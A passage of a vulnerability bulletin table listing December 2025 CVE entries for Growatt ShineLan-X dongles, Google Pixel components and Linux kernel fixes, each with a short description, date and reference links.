| Growatt--ShineLan-X | Encryption is missing on the configuration interface for Growatt ShineLan-X and MIC 3300TL-X. This allows an attacker with access to the network to intercept and potentially manipulate communication requests between the inverter and its cloud endpoint. | 2025-12-13 | not yet calculated | CVE-2025-36751 | https://csirt.divd.nl/CVE-2025-36751/ |
| Growatt--ShineLan-X | Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows significant access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively a backdoor for all devices utilizing a Growatt ShineLan-X communication dongle. | 2025-12-13 | not yet calculated | CVE-2025-36752 | https://csirt.divd.nl/CVE-2025-36752/ |
| Growatt--ShineLan-X | The SWD debug interface on the Growatt ShineLan-X communication dongle is available by default, allowing an attacker to attain debug access to the device and to extract secrets or domains from within the device. | 2025-12-13 | not yet calculated | CVE-2025-36753 | https://csirt.divd.nl/CVE-2025-36753/ |
| Growatt--ShineLan-X | The authentication mechanism on the web interface is not properly implemented. It is possible to bypass authentication checks by crafting a POST request with new settings since there is no session token or authentication in place. This would allow an attacker, for instance, to point the device to an arbitrary address for domain name resolution to e.g. facilitate a man-in-the-middle (MitM) attack. | 2025-12-13 | not yet calculated | CVE-2025-36754 | https://csirt.divd.nl/CVE-2025-36754/ |
| CleverDisplay B.V.--BlueOne (CleverDisplay Hardware Player) | The CleverDisplay BlueOne hardware player is designed with its USB interfaces physically enclosed and inaccessible under normal operating conditions. Researchers demonstrated that, after circumventing the device's protective enclosure, it was possible to connect a USB keyboard and press ESC during boot to access the BIOS setup interface. BIOS settings could be viewed but not modified. This behavior slightly increases the attack surface by exposing internal system information (CWE-1244) once the enclosure is removed, but does not allow integrity or availability compromise under standard or tested configurations. | 2025-12-12 | not yet calculated | CVE-2025-36755 | https://csirt.divd.nl/CVE-2025-5743/ https://csirt.divd.nl/DIVD-2025-00043 |
| Google--Android | In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36889 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In cellular modem, there is a possible denial of service due to a logic error in the code. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36912 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In PrepareWorkloadBuffers of gxp_main_actor.cc, there is a possible double fetch due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36916 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In SwDcpItg of up_L2commonPdcpSecurity.cpp, there is a possible denial of service due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36917 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In aoc_service_read_message of aoc_ipc_core.c, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36918 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In aocc_read of aoc_channel_dev.c, there is a possible double free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36919 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In ProtocolPsUnthrottleApn() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36921 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In bigo_map of bigo_iommu.c, there is a possible information disclosure due to a use after free. This could lead to local escalation of privilege in the OS Kernel level with System execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36922 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In NrmmDecoder::DecodeSORTransparentContext of cn_NrmmDecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36923 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In ss_DecodeLcsAssistDataReqMsg(void) of ss_LcsManagement.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36924 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36925 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36927 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36928 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36929 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36930 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36931 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In tracepoint_msg_handler of cpm/google/lib/tracepoint/tracepoint_ipc.c, there is a possible memory overwrite due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36932 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In bigo_worker_thread of private/google-modules/video/gchips/bigo.c, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36934 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In trusty_ffa_mem_reclaim of shared-mem-smcall.c, there is a possible memory corruption due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36935 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36936 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In AudioDecoder::HandleProduceRequest of audio_decoder.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36937 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In U-Boot of append_uint32_le(), there is a possible fault injection due to a logic error in the code. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36938 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: avoid data corruption on cq descriptor number Since commit 30f241fcf52a ("xsk: Fix immature cq descriptor production"), the descriptor number is stored in skb control block and xsk_cq_submit_addr_locked() relies on it to put the umem addrs onto pool's completion queue. skb control block shouldn't be used for this purpose as after transmit xsk doesn't have control over it and other subsystems could use it. This leads to the following kernel panic due to a NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 2 UID: 1 PID: 927 Comm: p4xsk.bin Not tainted 6.16.12+deb14-cloud-amd64 #1 PREEMPT(lazy) Debian 6.16.12-1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:xsk_destruct_skb+0xd0/0x180 [...] Call Trace: <IRQ> ? napi_complete_done+0x7a/0x1a0 ip_rcv_core+0x1bb/0x340 ip_rcv+0x30/0x1f0 __netif_receive_skb_one_core+0x85/0xa0 process_backlog+0x87/0x130 __napi_poll+0x28/0x180 net_rx_action+0x339/0x420 handle_softirqs+0xdc/0x320 ? handle_edge_irq+0x90/0x1e0 do_softirq.part.0+0x3b/0x60 </IRQ> <TASK> __local_bh_enable_ip+0x60/0x70 __dev_direct_xmit+0x14e/0x1f0 __xsk_generic_xmit+0x482/0xb70 ? __remove_hrtimer+0x41/0xa0 ? __xsk_generic_xmit+0x51/0xb70 ? _raw_spin_unlock_irqrestore+0xe/0x40 xsk_sendmsg+0xda/0x1c0 __sys_sendto+0x1ee/0x200 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x84/0x2f0 ? __pfx_pollwake+0x10/0x10 ? __rseq_handle_notify_resume+0xad/0x4c0 ? restore_fpregs_from_fpstate+0x3c/0x90 ? switch_fpu_return+0x5b/0xe0 ? do_syscall_64+0x204/0x2f0 ? do_syscall_64+0x204/0x2f0 ? do_syscall_64+0x204/0x2f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> [...] Kernel panic - not syncing: Fatal exception in interrupt Kernel Offset: 0x1c000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) Instead use the skb destructor_arg pointer along with pointer tagging. As pointers are always aligned to 8B, use the bottom bit to indicate whether this is a single address or an allocated struct containing several addresses. | 2025-12-08 | not yet calculated | CVE-2025-40290 | https://git.kernel.org/stable/c/c5ea2e50b5c9aa80c5b53526257540f0c26cd66d https://git.kernel.org/stable/c/0ebc27a4c67d44e5ce88d21cdad8201862b78837 https://bugs.debian.org/1118437 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix regbuf vector size truncation There is a report of io_estimate_bvec_size() truncating the calculated number of segments that leads to corruption issues. Check it doesn't overflow "int"s used later. Rough but simple, can be improved on top. | 2025-12-08 | not yet calculated | CVE-2025-40291 | https://git.kernel.org/stable/c/826ce37a842633efe1bb763e4b13045d74060d72 https://git.kernel.org/stable/c/146eb58629f45f8297e83d69e64d4eea4b28d972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-net: fix received length check in big packets Since commit 4959aebba8c0 ("virtio-net: use mtu size as buffer length for big packets"), when guest gso is off, the allocated size for big packets is not MAX_SKB_FRAGS * PAGE_SIZE anymore but depends on negotiated MTU. The number of allocated frags for big packets is stored in vi->big_packets_num_skbfrags. Because the host announced buffer length can be malicious (e.g. the host vhost_net driver's get_rx_bufs is modified to announce incorrect length), we need a check in virtio_net receive path. Currently, the check is not adapted to the new change which can lead to NULL page pointer dereference in the below while loop when receiving length that is larger than the allocated one. This commit fixes the received length check corresponding to the new change. | 2025-12-08 | not yet calculated | CVE-2025-40292 | https://git.kernel.org/stable/c/82f9028e83944a9eee5229cbc6fee9be1de8a62d https://git.kernel.org/stable/c/946dec89c41726b94d31147ec528b96af0be1b5a https://git.kernel.org/stable/c/82fe78065450d2d07f36a22e2b6b44955cf5ca5b https://git.kernel.org/stable/c/3e9d89f2ecd3636bd4cbdfd0b2dfdaf58f9882e2 https://git.kernel.org/stable/c/0c716703965ffc5ef4311b65cb5d84a703784717 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Don't overflow during division for dirty tracking If pgshift is 63 then BITS_PER_TYPE(*bitmap->bitmap) * pgsize will overflow to 0 and this triggers divide by 0. In this case the index should just be 0, so reorganize things to divide by shift and avoid hitting any overflows. | 2025-12-08 | not yet calculated | CVE-2025-40293 | https://git.kernel.org/stable/c/07105e61882ff4a7d58db63cc5f9e90c6c60506c https://git.kernel.org/stable/c/4c8a4f1d34eced168cc0b3a3dfe7b6dcc2090f69 https://git.kernel.org/stable/c/de7f2c67ceb1941b05b04ac35458a03e93cc57b1 https://git.kernel.org/stable/c/dbf316fc90aa954dcd5440817f4b944627ed63e0 https://git.kernel.org/stable/c/cb30dfa75d55eced379a42fd67bd5fb7ec38555e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix OOB access in parse_adv_monitor_pattern() In the parse_adv_monitor_pattern() function, the value of the 'length' variable is currently limited to HCI_MAX_EXT_AD_LENGTH(251). The size of the 'value' array in the mgmt_adv_pattern structure is 31. If the value of 'pattern[i].length' is set in the user space and exceeds 31, the 'patterns[i].value' array can be accessed out of bound when copied. Increasing the size of the 'value' array in the 'mgmt_adv_pattern' structure will break the userspace. Considering this, and to avoid OOB access revert the limits for 'offset' and 'length' back to the value of HCI_MAX_AD_LENGTH. Found by InfoTeCS on behalf of Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-08 | not yet calculated | CVE-2025-40294 | https://git.kernel.org/stable/c/96616530f524a0a76248cd44201de0a9e8526190 https://git.kernel.org/stable/c/5f7350ff2b179764a4f40ba4161b60b8aaef857b https://git.kernel.org/stable/c/4b7d4aa5399b5a64caee639275615c63c008540d https://git.kernel.org/stable/c/3a50d59b3781bc3a4e96533612509546a4c309a7 https://git.kernel.org/stable/c/8d59fba49362c65332395789fd82771f1028d87e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fscrypt: fix left shift underflow when inode->i_blkbits > PAGE_SHIFT When simulating an nvme device on qemu with both logical_block_size and physical_block_size set to 8 KiB, an error trace appears during partition table reading at boot time. The issue is caused by inode->i_blkbits being larger than PAGE_SHIFT, which leads to a left shift of -1 and triggering a UBSAN warning. [ 2.697306] ------------[ cut here ]------------ [ 2.697309] UBSAN: shift-out-of-bounds in fs/crypto/inline_crypt.c:336:37 [ 2.697311] shift exponent -1 is negative [ 2.697315] CPU: 3 UID: 0 PID: 274 Comm: (udev-worker) Not tainted 6.18.0-rc2+ #34 PREEMPT(voluntary) [ 2.697317] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 2.697320] Call Trace: [ 2.697324] <TASK> [ 2.697325] dump_stack_lvl+0x76/0xa0 [ 2.697340] dump_stack+0x10/0x20 [ 2.697342] __ubsan_handle_shift_out_of_bounds+0x1e3/0x390 [ 2.697351] bh_get_inode_and_lblk_num.cold+0x12/0x94 [ 2.697359] fscrypt_set_bio_crypt_ctx_bh+0x44/0x90 [ 2.697365] submit_bh_wbc+0xb6/0x190 [ 2.697370] block_read_full_folio+0x194/0x270 [ 2.697371] ? __pfx_blkdev_get_block+0x10/0x10 [ 2.697375] ? __pfx_blkdev_read_folio+0x10/0x10 [ 2.697377] blkdev_read_folio+0x18/0x30 [ 2.697379] filemap_read_folio+0x40/0xe0 [ 2.697382] filemap_get_pages+0x5ef/0x7a0 [ 2.697385] ? mmap_region+0x63/0xd0 [ 2.697389] filemap_read+0x11d/0x520 [ 2.697392] blkdev_read_iter+0x7c/0x180 [ 2.697393] vfs_read+0x261/0x390 [ 2.697397] ksys_read+0x71/0xf0 [ 2.697398] __x64_sys_read+0x19/0x30 [ 2.697399] x64_sys_call+0x1e88/0x26a0 [ 2.697405] do_syscall_64+0x80/0x670 [ 2.697410] ? __x64_sys_newfstat+0x15/0x20 [ 2.697414] ? x64_sys_call+0x204a/0x26a0 [ 2.697415] ? do_syscall_64+0xb8/0x670 [ 2.697417] ? irqentry_exit_to_user_mode+0x2e/0x2a0 [ 2.697420] ? irqentry_exit+0x43/0x50 [ 2.697421] ? exc_page_fault+0x90/0x1b0 [ 2.697422] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 2.697425] RIP: 0033:0x75054cba4a06 [ 2.697426] Code: 5d e8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 75 19 83 e2 39 83 fa 08 75 11 e8 26 ff ff ff 66 0f 1f 44 00 00 48 8b 45 10 0f 05 <48> 8b 5d f8 c9 c3 0f 1f 40 00 f3 0f 1e fa 55 48 89 e5 48 83 ec 08 [ 2.697427] RSP: 002b:00007fff973723a0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000 [ 2.697430] RAX: ffffffffffffffda RBX: 00005ea9a2c02760 RCX: 000075054cba4a06 [ 2.697432] RDX: 0000000000002000 RSI: 000075054c190000 RDI: 000000000000001b [ 2.697433] RBP: 00007fff973723c0 R08: 0000000000000000 R09: 0000000000000000 [ 2.697434] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000 [ 2.697434] R13: 00005ea9a2c027c0 R14: 00005ea9a2be5608 R15: 00005ea9a2be55f0 [ 2.697436] </TASK> [ 2.697436] ---[ end trace ]--- This situation can happen for block devices because when CONFIG_TRANSPARENT_HUGEPAGE is enabled, the maximum logical_block_size is 64 KiB. set_init_blocksize() then sets the block device inode->i_blkbits to 13, which is within this limit. File I/O does not trigger this problem because for filesystems that do not support the FS_LBS feature, sb_set_blocksize() prevents sb->s_blocksize_bits from being larger than PAGE_SHIFT. During inode allocation, alloc_inode()->inode_init_always() assigns inode->i_blkbits from sb->s_blocksize_bits. Currently, only xfs_fs_type has the FS_LBS flag, and since xfs I/O paths do not reach submit_bh_wbc(), it does not hit the left-shift underflow issue. [EB: use folio_pos() and consolidate the two shifts by i_blkbits] | 2025-12-08 | not yet calculated | CVE-2025-40295 | https://git.kernel.org/stable/c/dde026c5d2a5870f97924d5b512adf2b93fb7153 https://git.kernel.org/stable/c/1e39da974ce621ed874c6d3aaf65ad14848c9f0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: int3472: Fix double free of GPIO device during unregister regulator_unregister() already frees the associated GPIO device. On ThinkPad X9 (Lunar Lake), this causes a double free issue that leads to random failures when other drivers (typically Intel THC) attempt to allocate interrupts. The root cause is that the reference count of the pinctrl_intel_platform module unexpectedly drops to zero when this driver defers its probe. This behavior can also be reproduced by unloading the module directly. Fix the issue by removing the redundant release of the GPIO device during regulator unregistration. | 2025-12-08 | not yet calculated | CVE-2025-40296 | https://git.kernel.org/stable/c/b8113bb56c45bd17bac5144b55591f9cdbd6aabe https://git.kernel.org/stable/c/f0f7a3f542c1698edb69075f25a3f846207facba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix use-after-free due to MST port state bypass syzbot reported[1] a use-after-free when deleting an expired fdb. It is due to a race condition between learning still happening and a port being deleted, after all its fdbs have been flushed. The port's state has been toggled to disabled so no learning should happen at that time, but if we have MST enabled, it will bypass the port's state, that together with VLAN filtering disabled can lead to fdb learning at a time when it shouldn't happen while the port is being deleted. VLAN filtering must be disabled because we flush the port VLANs when it's being deleted which will stop learning. This fix adds a check for the port's vlan group which is initialized to NULL when the port is getting deleted, that avoids the port state bypass. When MST is enabled there would be a minimal new overhead in the fast-path because the port's vlan group pointer is cache-hot. [1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be | 2025-12-08 | not yet calculated | CVE-2025-40297 | https://git.kernel.org/stable/c/e19085b2a86addccff33ab8536fc67ebd9d52198 https://git.kernel.org/stable/c/3b60ce334c1ce8b3fad7e02dcd5ed9f6646477c8 https://git.kernel.org/stable/c/bf3843183bc3158e5821b46f330c438ae9bd6ddb https://git.kernel.org/stable/c/991fbe1680cd41a5f97c92cd3a3496315df36e4b https://git.kernel.org/stable/c/8dca36978aa80bab9d4da130c211db75c9e00048 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: Implement settime64 with -EOPNOTSUPP ptp_clock_settime() assumes every ptp_clock has implemented settime64(). Stub it with -EOPNOTSUPP to prevent a NULL dereference. | 2025-12-08 | not yet calculated | CVE-2025-40298 | https://git.kernel.org/stable/c/c9efb03ff4fae0bc7e5ef3323c3aab599cb4c88a https://git.kernel.org/stable/c/329d050bbe63c2999f657cf2d3855be11a473745 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: Implement gettimex64 with -EOPNOTSUPP gve implemented a ptp_clock for sole use of do_aux_work at this time. ptp_clock_gettime() and ptp_sys_offset() assume every ptp_clock has implemented either gettimex64 or gettime64. Stub gettimex64 and return -EOPNOTSUPP to prevent NULL dereferencing. | 2025-12-08 | not yet calculated | CVE-2025-40299 | https://git.kernel.org/stable/c/96ec90412ceb58c73fd3714e40ab2cee1eedac3b https://git.kernel.org/stable/c/6ab753b5d8e521616cd9bd10b09891cbeb7e0235 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: validate skb length for unknown CC opcode In hci_cmd_complete_evt(), if the command complete event has an unknown opcode, we assume the first byte of the remaining skb->data contains the return status. However, parameter data has previously been pulled in hci_event_func(), which may leave the skb empty. If so, using skb->data[0] for the return status uses un-init memory. The fix is to check skb->len before using skb->data. | 2025-12-08 | not yet calculated | CVE-2025-40301 | https://git.kernel.org/stable/c/fea895de78d3bb2f0c09db9f10b18f8121b15759 https://git.kernel.org/stable/c/779f83a91d4f1bf5ddfeaf528420cbb6dbf03fa8 https://git.kernel.org/stable/c/cf2c2acec1cf456c3d11c11a7589e886a0f963a9 https://git.kernel.org/stable/c/1a0ddaaf97405dbd11d4cb5a961a3f82400e8a50 https://git.kernel.org/stable/c/5c5f1f64681cc889d9b13e4a61285e9e029d6ab5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: videobuf2: forbid remove_bufs when legacy fileio is active vb2_ioctl_remove_bufs() call manipulates queue internal buffer list, potentially overwriting some pointers used by the legacy fileio access mode. Forbid that ioctl when fileio is active to protect internal queue state between subsequent read/write calls. | 2025-12-08 | not yet calculated | CVE-2025-40302 | https://git.kernel.org/stable/c/a6a493b985bfffac097a4e1be09f98b27729dca8 https://git.kernel.org/stable/c/e819b34df0a7030a15c968d619fa8a3ed2455c7a https://git.kernel.org/stable/c/27afd6e066cfd80ddbe22a4a11b99174ac89cced |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: ensure no dirty metadata is written back for an fs with errors [BUG] During development of a minor feature (make sure all btrfs_bio::end_io() is called in task context), I noticed a crash in generic/388, where metadata writes triggered new works after btrfs_stop_all_workers(). It turns out that it can even happen without any code modification, just using RAID5 for metadata and the same workload from generic/388 is going to trigger the use-after-free. [CAUSE] If btrfs hits an error, the fs is marked as error, no new transaction is allowed thus metadata is in a frozen state. But there are some metadata modifications before that error, and they are still in the btree inode page cache. Since there will be no real transaction commit, all those dirty folios are just kept as is in the page cache, and they can not be invalidated by invalidate_inode_pages2() call inside close_ctree(), because they are dirty. And finally after btrfs_stop_all_workers(), we call iput() on btree inode, which triggers writeback of those dirty metadata. And if the fs is using RAID56 metadata, this will trigger RMW and queue new works into rmw_workers, which is already stopped, causing warning from queue_work() and use-after-free. [FIX] Add a special handling for write_one_eb(), that if the fs is already in an error state, immediately mark the bbio as failure, instead of really submitting them. Then during close_ctree(), iput() will just discard all those dirty tree blocks without really writing them back, thus no more new jobs for already stopped-and-freed workqueues. The extra discard in write_one_eb() also acts as an extra safety net. E.g. the transaction abort is triggered by some extent/free space tree corruptions, and since extent/free space tree is already corrupted some tree blocks may be allocated where they shouldn't be (overwriting existing tree blocks). In that case writing them back will further corrupt the fs. | 2025-12-08 | not yet calculated | CVE-2025-40303 | https://git.kernel.org/stable/c/066ee13f05fbd82ada01883e51f0695172f98dff https://git.kernel.org/stable/c/e2b3859067bf012d53c49b3f885fef40624a2c83 https://git.kernel.org/stable/c/54a5b5a15588e3b0b294df31474d08a2678d4291 https://git.kernel.org/stable/c/2618849f31e7cf51fadd4a5242458501a6d5b315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds Add bounds checking to prevent writes past framebuffer boundaries when rendering text near screen edges. Return early if the Y position is off-screen and clip image height to screen boundary. Break from the rendering loop if the X position is off-screen. When clipping image width to fit the screen, update the character count to match the clipped width to prevent buffer size mismatches. Without the character count update, bit_putcs_aligned and bit_putcs_unaligned receive mismatched parameters where the buffer is allocated for the clipped width but cnt reflects the original larger count, causing out-of-bounds writes. | 2025-12-08 | not yet calculated | CVE-2025-40304 | https://git.kernel.org/stable/c/996bfaa7372d6718b6d860bdf78f6618e850c702 https://git.kernel.org/stable/c/f0982400648a3e00580253e0c48e991f34d2684c https://git.kernel.org/stable/c/1943b69e87b0ab35032d47de0a7fca9a3d1d6fc1 https://git.kernel.org/stable/c/ebc0730b490c7f27340b1222e01dd106e820320d https://git.kernel.org/stable/c/86df8ade88d290725554cefd03101ecd0fbd3752 https://git.kernel.org/stable/c/15ba9acafb0517f8359ca30002c189a68ddbb939 https://git.kernel.org/stable/c/2d1359e11674ed4274934eac8a71877ae5ae7bbb https://git.kernel.org/stable/c/3637d34b35b287ab830e66048841ace404382b67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p/trans_fd: p9_fd_request: kick rx thread if EPOLLIN p9_read_work() doesn't set Rworksched and doesn't do schedule_work(m->rq) if list_empty(&m->req_list). However, if the pipe is full, we need to read more data and this used to work prior to commit aaec5a95d59615 ("pipe_read: don't wake up the writer if the pipe is still full"). p9_read_work() does p9_fd_read() -> ... -> anon_pipe_read() which (before the commit above) triggered the unnecessary wakeup. This wakeup calls p9_pollwake() which kicks p9_poll_workfn() -> p9_poll_mux(), p9_poll_mux() will notice EPOLLIN and schedule_work(&m->rq). This no longer happens after the optimization above, change p9_fd_request() to use p9_poll_mux() instead of only checking for EPOLLOUT. | 2025-12-08 | not yet calculated | CVE-2025-40305 | https://git.kernel.org/stable/c/2e1461034aef99e905a1fe5589aaf00eaea73eee https://git.kernel.org/stable/c/242531004d7de8c159f9bfadebe33fe8060b1046 https://git.kernel.org/stable/c/e8fe3f07a357c39d429e02ca34f740692d88967a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: orangefs: fix xattr related buffer overflow... Willy Tarreau <w@1wt.eu> forwarded me a message from Disclosure <disclosure@aisle.com> with the following warning: > The helper `xattr_key()` uses the pointer variable in the loop condition > rather than dereferencing it. As `key` is incremented, it remains non-NULL > (until it runs into unmapped memory), so the loop does not terminate on > valid C strings and will walk memory indefinitely, consuming CPU or hanging > the thread. I easily reproduced this with setfattr and getfattr, causing a kernel oops, hung user processes and corrupted orangefs files. Disclosure sent along a diff (not a patch) with a suggested fix, which I based this patch on. After xattr_key started working right, xfstest generic/069 exposed an xattr related memory leak that lead to OOM. xattr_key returns a hashed key. When adding xattrs to the orangefs xattr cache, orangefs used hash_add, a kernel hashing macro. hash_add also hashes the key using hash_log which resulted in additions to the xattr cache going to the wrong hash bucket. generic/069 tortures a single file and orangefs does a getattr for the xattr "security.capability" every time. Orangefs negative caches on xattrs which includes a kmalloc. Since adds to the xattr cache were going to the wrong bucket, every getattr for "security.capability" resulted in another kmalloc, none of which were ever freed. I changed the two uses of hash_add to hlist_add_head instead and the memory leak ceased and generic/069 quit throwing furniture. | 2025-12-08 | not yet calculated | CVE-2025-40306 | https://git.kernel.org/stable/c/c6564ff6b53c9a8dc786b6f1c51ae7688273f931 https://git.kernel.org/stable/c/ef892d2bf4f3fa2c8de1677dd307e678bdd3d865 https://git.kernel.org/stable/c/15afebb9597449c444801d1ff0b8d8b311f950ab https://git.kernel.org/stable/c/bc812574de633cf9a9ad6974490e45f6a4bb5126 https://git.kernel.org/stable/c/e09a096104fc65859422817fb2211f35855983fe https://git.kernel.org/stable/c/9127d1e90c90e5960c8bc72a4ce2c209691a7021 https://git.kernel.org/stable/c/c2ca015ac109fd743fdde27933d59dc5ad46658e https://git.kernel.org/stable/c/025e880759c279ec64d0f754fe65bf45961da864 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: validate cluster allocation bits of the allocation bitmap syzbot created an exfat image with cluster bits not set for the allocation bitmap. exfat-fs reads and uses the allocation bitmap without checking this. The problem is that if the start cluster of the allocation bitmap is 6, cluster 6 can be allocated when creating a directory with mkdir. exfat zeros out this cluster in exfat_mkdir, which can delete existing entries. This can reallocate the allocated entries. In addition, the allocation bitmap is also zeroed out, so cluster 6 can be reallocated. This patch adds exfat_test_bitmap_range to validate that clusters used for the allocation bitmap are correctly marked as in-use. | 2025-12-08 | not yet calculated | CVE-2025-40307 | https://git.kernel.org/stable/c/6bc58b4c53795ab5fe00648344aa7d9d61175f90 https://git.kernel.org/stable/c/13c1d24803d5b0446b3f6f0fdd67e07ac1fdc7bf https://git.kernel.org/stable/c/79c1587b6cda74deb0c86fc7ba194b92958c793c |
